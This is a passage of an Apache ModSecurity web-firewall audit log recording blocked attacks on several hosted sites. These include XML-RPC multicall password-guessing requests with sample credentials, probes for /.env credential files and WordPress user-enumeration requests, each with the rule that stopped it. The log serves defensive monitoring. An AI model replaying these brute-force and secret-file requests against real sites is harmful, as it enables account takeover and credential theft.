Stopwatch: 1748431229707454 5202 (- - -) Stopwatch2: 1748431229707454 5202; combined=3888, p1=432, p2=3285, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fab33a-Z-- --7c933b10-A-- [28/May/2025:18:21:39 +0700] aDbxw-szXCullgn3bbG-HgAAABE 103.236.140.4 34372 103.236.140.4 8181 --7c933b10-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7c933b10-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelazerty --7c933b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c933b10-E-- --7c933b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748431299804760 5761 (- - -) Stopwatch2: 1748431299804760 5761; combined=4404, p1=502, p2=3714, p3=0, p4=0, p5=111, sr=86, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c933b10-Z-- --dc680f31-A-- [28/May/2025:18:27:54 +0700] aDbzOvnnEwDNUSjDseIsQgAAAII 103.236.140.4 38774 103.236.140.4 8181 --dc680f31-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.22.34.189 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dc680f31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc680f31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748431674315562 1248 (- - -) Stopwatch2: 1748431674315562 1248; combined=394, p1=341, p2=0, p3=0, p4=0, p5=53, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc680f31-Z-- --cdd92b53-A-- [28/May/2025:18:28:47 +0700] aDbzbw3r-0gDryHAyD_b_AAAAFI 103.236.140.4 38898 103.236.140.4 8181 --cdd92b53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cdd92b53-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel!@#$antix1234 --cdd92b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd92b53-E-- --cdd92b53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748431727855484 5376 (- - -) Stopwatch2: 1748431727855484 5376; combined=3918, p1=420, p2=3272, p3=0, p4=0, p5=136, sr=78, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd92b53-Z-- --6ca32233-A-- [28/May/2025:18:30:08 +0700] aDbzwA3r-0gDryHAyD_cEAAAAE8 103.236.140.4 39042 103.236.140.4 8181 --6ca32233-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 128.199.182.152 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ca32233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ca32233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748431808012095 835 (- - -) Stopwatch2: 1748431808012095 835; combined=321, p1=290, p2=0, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ca32233-Z-- --143f5335-A-- [28/May/2025:18:36:41 +0700] aDb1SQ3r-0gDryHAyD_ckAAAAEk 103.236.140.4 39556 103.236.140.4 8181 --143f5335-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.211.5.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.211.5.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --143f5335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --143f5335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432201028705 3165 (- - -) Stopwatch2: 1748432201028705 3165; combined=1310, p1=437, p2=836, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --143f5335-Z-- --79581966-A-- [28/May/2025:18:41:51 +0700] aDb2f-szXCullgn3bbG_hwAAABY 103.236.140.4 40044 103.236.140.4 8181 --79581966-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.205.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.205.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79581966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79581966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432511856350 2969 (- - -) Stopwatch2: 1748432511856350 2969; combined=1281, p1=438, p2=811, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79581966-Z-- --5dfdbf1e-A-- [28/May/2025:18:43:39 +0700] aDb26_nnEwDNUSjDseIssgAAAJI 103.236.140.4 40212 103.236.140.4 8181 --5dfdbf1e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.230 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.230 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5dfdbf1e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel& --5dfdbf1e-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dfdbf1e-E-- --5dfdbf1e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748432619670049 5541 (- - -) Stopwatch2: 1748432619670049 5541; combined=4069, p1=394, p2=3469, p3=21, p4=25, p5=96, sr=93, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dfdbf1e-Z-- --e7b51d43-A-- [28/May/2025:18:44:43 +0700] aDb3K_nnEwDNUSjDseIswQAAAJM 103.236.140.4 40292 103.236.140.4 8181 --e7b51d43-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e7b51d43-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaadhel5 --e7b51d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b51d43-E-- --e7b51d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432683883708 4684 (- - -) Stopwatch2: 1748432683883708 4684; combined=3576, p1=386, p2=3030, p3=0, p4=0, p5=93, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b51d43-Z-- --8ad9ea74-A-- [28/May/2025:18:50:37 +0700] aDb4jfnnEwDNUSjDseItAQAAAIM 103.236.140.4 40828 103.236.140.4 8181 --8ad9ea74-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8ad9ea74-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilantix1234 --8ad9ea74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad9ea74-E-- --8ad9ea74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433037058975 6237 (- - -) Stopwatch2: 1748433037058975 6237; combined=4271, p1=506, p2=3588, p3=0, p4=0, p5=108, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad9ea74-Z-- --851caf4f-A-- [28/May/2025:18:51:23 +0700] aDb4uxwBHP_x2VCWa06Z4wAAAM8 103.236.140.4 40870 103.236.140.4 8181 --851caf4f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --851caf4f-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil@23 --851caf4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --851caf4f-E-- --851caf4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433083046610 4605 (- - -) Stopwatch2: 1748433083046610 4605; combined=3613, p1=378, p2=3067, p3=0, p4=0, p5=98, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --851caf4f-Z-- --dd71db13-A-- [28/May/2025:18:52:04 +0700] aDb45PnnEwDNUSjDseItDAAAAIQ 103.236.140.4 40920 103.236.140.4 8181 --dd71db13-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dd71db13-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil** --dd71db13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd71db13-E-- --dd71db13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433124057355 6141 (- - -) Stopwatch2: 1748433124057355 6141; combined=4338, p1=494, p2=3668, p3=0, p4=0, p5=104, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd71db13-Z-- --2ee4d81e-A-- [28/May/2025:19:15:50 +0700] aDb-dg3r-0gDryHAyD_eIgAAAFQ 103.236.140.4 43134 103.236.140.4 8181 --2ee4d81e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.221 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.221 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2ee4d81e-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil1975 --2ee4d81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ee4d81e-E-- --2ee4d81e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.221 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748434550452929 5472 (- - -) Stopwatch2: 1748434550452929 5472; combined=4410, p1=472, p2=3763, p3=0, p4=0, p5=106, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ee4d81e-Z-- --1dbdf078-A-- [28/May/2025:19:23:33 +0700] aDcAReszXCullgn3bbHBAwAAAA4 103.236.140.4 43750 103.236.140.4 8181 --1dbdf078-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.208.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.208.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1dbdf078-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dbdf078-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748435013677194 1996 (- - -) Stopwatch2: 1748435013677194 1996; combined=1026, p1=350, p2=650, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dbdf078-Z-- --d262b130-A-- [28/May/2025:19:28:51 +0700] aDcBgw3r-0gDryHAyD_ekAAAAEs 103.236.140.4 44162 103.236.140.4 8181 --d262b130-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.190.36.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.190.36.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d262b130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d262b130-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748435331241834 2182 (- - -) Stopwatch2: 1748435331241834 2182; combined=1039, p1=352, p2=667, p3=0, p4=0, p5=20, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d262b130-Z-- --0d19834c-A-- [28/May/2025:19:31:58 +0700] aDcCPhwBHP_x2VCWa06a7wAAANE 103.236.140.4 44374 103.236.140.4 8181 --0d19834c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0d19834c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d19834c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748435518076586 773 (- - -) Stopwatch2: 1748435518076586 773; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d19834c-Z-- --e2079631-A-- [28/May/2025:19:32:16 +0700] aDcCUBwBHP_x2VCWa06a9QAAAMc 103.236.140.4 44410 103.236.140.4 8181 --e2079631-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e2079631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2079631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748435536889515 794 (- - -) Stopwatch2: 1748435536889515 794; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2079631-Z-- --5315801f-A-- [28/May/2025:19:44:37 +0700] aDcFNfnnEwDNUSjDseIuhQAAAJA 103.236.140.4 45508 103.236.140.4 8181 --5315801f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.119.97.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.119.97.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5315801f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5315801f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 